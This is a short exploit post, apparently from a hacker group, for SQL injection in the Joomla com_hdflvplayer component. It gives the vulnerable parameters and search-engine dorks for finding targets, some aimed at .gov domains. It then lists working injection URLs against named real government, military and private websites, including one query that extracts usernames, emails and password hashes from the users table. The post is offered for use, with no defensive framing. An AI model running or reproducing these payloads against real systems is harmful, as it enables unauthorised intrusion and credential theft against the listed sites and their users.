Joomla (ConfigXML) SQLi Exploit by Zeeshan Haxor ZeSn

1. Joomla Com_HdFlvPlayer (ConfigXML) SQLI Exploit by Zeeshan Haxor ZeSn
2. (Modified)
3.  
4. #Cyber TeamRox
5.  
6. Contact: http://www.fb.me/zee.haxor
7.  
8. Content : XML - Sqli - Blind - Integer
9.  
10. Vulnerable Parameters: "id=" "&mid=" "&taskconfig=imaadsxml"
11.  
12. Dork: inurl:/index.php?option=com_hdflvplayer site:.gov.*
13. inurl:/index.php?option=com_hdflvplayer
14. intext:"Below is a rendering of the page up to the first error."
15. inurl:/components/com_hdflvplayer/
16.  
17. #============================================================================================#
18.  
19. Demo : view-source:midas.mod.gov.my/index.php?option=com_hdflvplayer&taskconfig=configxml&id=4&mid=804+union+select+1,2--+
20. view-source:www.env.gov.sc/index.php?option=com_hdflvplayer&taskconfig=configxml&id=4&mid=null%27+union+select+1,user()--+
21. view-source:www.geo-army.ge/index.php?option=com_hdflvplayer&taskconfig=configxml&id=-1%27
22. view-source:saintig.org/index.php?Itemid=263&option=com_hdflvplayer&taskconfig=configxml&id=1&mid=1%27
23. http://www.batconservationindia.org/index.php?option=com_hdflvplayer&taskconfig=configxml
24. http://www.nul.ls/index.php?option=com_hdflvplayer&view=player&taskconfig=configxml&id=1&mid=1%27
25. SQL=SELECT id,params FROM `envdb2014a_modules` WHERE id=null' union select 1,user()-- and module='mod_hdflvplayer'
26. https://www.bluethnerworld.com/eklavier/index.php/en/de-DE?option=com_hdflvplayer&taskconfig=configxml&id=8&mid=98+/*!28393union*/+/*!93843select*/+1,2--+
27. http://culture.gd/index.php?option=com_hdflvplayer&taskconfig=configxml&id=14&mid=null+union+select+group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype,0x3a,block,0x3a,sendEmail,0x3a,gid,0x3a,registerDate,0x3a,lastvisitDate,0x3a,activation,params),2+from+jos_users--+
28.  
29. #================================================================================================#